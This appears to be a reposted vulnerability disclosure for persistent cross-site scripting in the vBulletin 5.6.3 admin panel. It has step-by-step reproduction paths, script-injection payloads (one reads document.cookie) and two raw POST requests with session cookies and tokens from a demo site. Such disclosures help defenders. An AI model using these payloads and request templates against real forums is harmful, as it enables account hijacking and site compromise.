vBulletin 5.6.3 Admin CP Multiple Persistent Cross-Site Scripting Vulnerabilities--
Kod:
I found a lot of fields in the Admin CP vBulletin 5.6.3 vulnerable to XSS.
We can see persistent xss in the Admin CP in vBulletin 5.6.3. If a
user has access to the admin panel, they can create a new page with an
XSS payload as the title.
1.
Click on "User Profile Fields" and choose "User Profile Field Manager"
in the menu. Choose "Occupation" and click on "Edit". Put simple xss
code in the "Title" and "Description" :
""><script>alert("xss")</script>
And save this. Click "Edit" and open:
https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=edit&profilefieldid=4
And we can see stored xss in "User Profile Field Manager".
Picture:
https://imgur.com/a/CebQFuT
2.
Open "Channel Management" - "Channel Manager" - Choose "blogs" and
click "add Announcement". Put xss code in the "Title" and save this.
Open site - blogs page and we can see Persistent XSS.
https://8289cfe4157f-041544.demo.vbulletin.net/blogs
Video:
https://www.youtube.com/watch?v=RuyYBIgXc_I
Picture:
https://imgur.com/a/WPHSG1l
Also we can change any channel what you want.(Groups,Forum,Albums,etc.)
Example 2:
https://8289cfe4157f-041544.demo.vbulletin.net/social-groups
Picture:
https://imgur.com/a/9LbO67E
3.
Go to the "User Titles". "Click on User Title Manager". Choose "Junior
Member" and click edit (simple example).
Put xss code in the Title, save this and come back to "User Title
Manager" and we have a persistent xss.
Picture:
https://imgur.com/a/gLOPiwB
4.
Go to the "Style" - "Styles Manager" and Click on Wood (simple
example), choose Actions "Edit Style Options"- "Edit Settings" - Go
and yes, put xss code in the
Title and save this. We can see Persistent XSS in "Styles Manager".
Picture:
https://imgur.com/a/7iCKea1
https://www.youtube.com/watch?v=E8c7eXVzChI
5.
Go to the "User Manual" (Help). Choose "Login / Logoff" and click "Add
Child Help Item" and in the "Title" put xss code and save this.
Picture:
https://imgur.com/a/EldYFLd
https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=update
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 716
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=edit&profilefieldid=4
Cookie: PHPSESSID=66bb49d8a0a0c85337e9f1ff2f477dd2c4c3278731f15b63;
BIGipServervbdemo-web_POOL=1459677194.20480.0000;
vb41544sessionhash=cabb7c438fad791fd753dd4ac0d63d9c;
vb41544lastvisit=1599040629; vb41544lastactivity=1599046274;
vb41544np_notices_displayed=;
vb41544cpsession=9795d7b732a28c69b2b7cf6b45e633fd;
vbulletin_inlinetag=1
Upgrade-Insecure-Requests: 1
s=cabb7c438fad791fd753dd4ac0d63d9c&do=update&adminhash=bcb0ead2d82b59b30a0fbbf87a2481ec&securitytoken=1599048055-ef3a49ab2f51ac32f08056eb9ebd789deab23514&title=Occupation
""><script>alert("xss")</script><script>alert(document.cookie)</script>&description=What's
your job?&profilefield[profilefieldcategoryid]=0&profilefield[data]=&profilefield[maxlength]=100&profilefield[size]=25&newtype=input&profilefield[displayorder]=4&profilefield[required]=0&profilefield[editable]=1&profilefield[hidden]=0&profilefield[searchable]=1&profilefield[memberlist]=1&profilefield[showonpost]=0&profilefield[regex]=&type=input&profilefieldid=4
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 12:01:15 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------
https://8289cfe4157f-041544.demo.vbulletin.net/admincp/template.php?do=updatestyle
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------270840692812758499333431033827
Content-Length: 1393
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/admincp/template.php?group=&do=editstyle&dostyleid=35
Cookie: PHPSESSID=66bb49d8a0a0c85337e9f1ff2f477dd2c4c3278731f15b63;
BIGipServervbdemo-web_POOL=1459677194.20480.0000;
vb41544sessionhash=cabb7c438fad791fd753dd4ac0d63d9c;
vb41544lastvisit=1599040629; vb41544lastactivity=1599046274;
vb41544np_notices_displayed=;
vb41544cpsession=9795d7b732a28c69b2b7cf6b45e633fd
Upgrade-Insecure-Requests: 1
s=cabb7c438fad791fd753dd4ac0d63d9c&do=updatestyle&adminhash=bcb0ead2d82b59b30a0fbbf87a2481ec&securitytoken=1599053871-12cb4d6d0b4ccdeb8b01deda904b721ccec94070&title=Wood""><script>alert("Style
vulnerable to xss")</script>&userselect=0&displayorder=1&dostyleid=35&oldparentid=34&parentid=34
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 13:37:55 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------
# 0day.today [2020-09-04] #
